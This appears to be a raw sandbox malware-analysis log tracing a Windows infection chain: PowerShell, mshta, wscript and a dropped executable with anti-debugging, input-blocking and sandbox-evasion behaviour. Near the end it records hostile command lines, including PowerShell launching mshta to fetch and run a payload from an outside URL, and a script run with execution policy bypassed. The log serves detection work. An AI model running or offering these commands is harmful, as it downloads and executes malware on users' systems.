Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Guard.exeProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1592Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 801Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 988Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1082Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4978Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4788Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6299
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1077
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3831
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5551
Source: C:\Windows\System32\mshta.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\ghepduy1325[1]Jump to dropped file
Source: C:\Users\user\AppData\Roaming\dqcwif.exeAPI coverage: 3.7 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6196Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828Thread sleep count: 988 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5828Thread sleep count: 1082 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4836Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 4876Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep time: -14757395258967632s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8204Thread sleep time: -21213755684765971s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8248Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7140Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8260Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8504Thread sleep count: 3831 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8536Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8508Thread sleep count: 5551 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8488Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8524Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B9C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,19_2_00007FF6B5B9C7C0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B9B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00007FF6B5B9B7C0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BA72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,19_2_00007FF6B5BA72A8
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BA71F4 FindFirstFileW,FindClose,19_2_00007FF6B5BA71F4
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B9BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,19_2_00007FF6B5B9BC70
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BAA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,19_2_00007FF6B5BAA874
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BAA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,19_2_00007FF6B5BAA4F8
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BA6428 FindFirstFileW,FindNextFileW,FindClose,19_2_00007FF6B5BA6428
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BAA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,19_2_00007FF6B5BAA350
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B62F50 FindFirstFileExW,19_2_00007FF6B5B62F50
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B41D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,19_2_00007FF6B5B41D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: powershell.exe, 00000018.00000002.2606180897.0000020375E32000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: wscript.exe, 00000020.00000002.2643246889.0000026E720B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB0A00 BlockInput,19_2_00007FF6B5BB0A00
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_00007FF6B5B237B0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B45BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,19_2_00007FF6B5B45BC0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5BB7634 LoadLibraryA,GetProcAddress,19_2_00007FF6B5BB7634
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B8D6A0 GetLengthSid,CopySid,GetProcessHeap,HeapFree,19_2_00007FF6B5B8D6A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B457E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF6B5B457E4
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B459C8 SetUnhandledExceptionFilter,19_2_00007FF6B5B459C8
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B68FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,19_2_00007FF6B5B68FE4
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B5AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_00007FF6B5B5AF58

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\AppData\Roaming\dqcwif.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B8CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_00007FF6B5B8CE68
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,19_2_00007FF6B5B237B0
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B99420 SendInput,keybd_event,19_2_00007FF6B5B99420
Source: C:\Users\user\AppData\Roaming\dqcwif.exeCode function: 19_2_00007FF6B5B9D1A4 mouse_event,19_2_00007FF6B5B9D1A4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://tiffany-careers.com/ghepduy1325"Jump to behavior
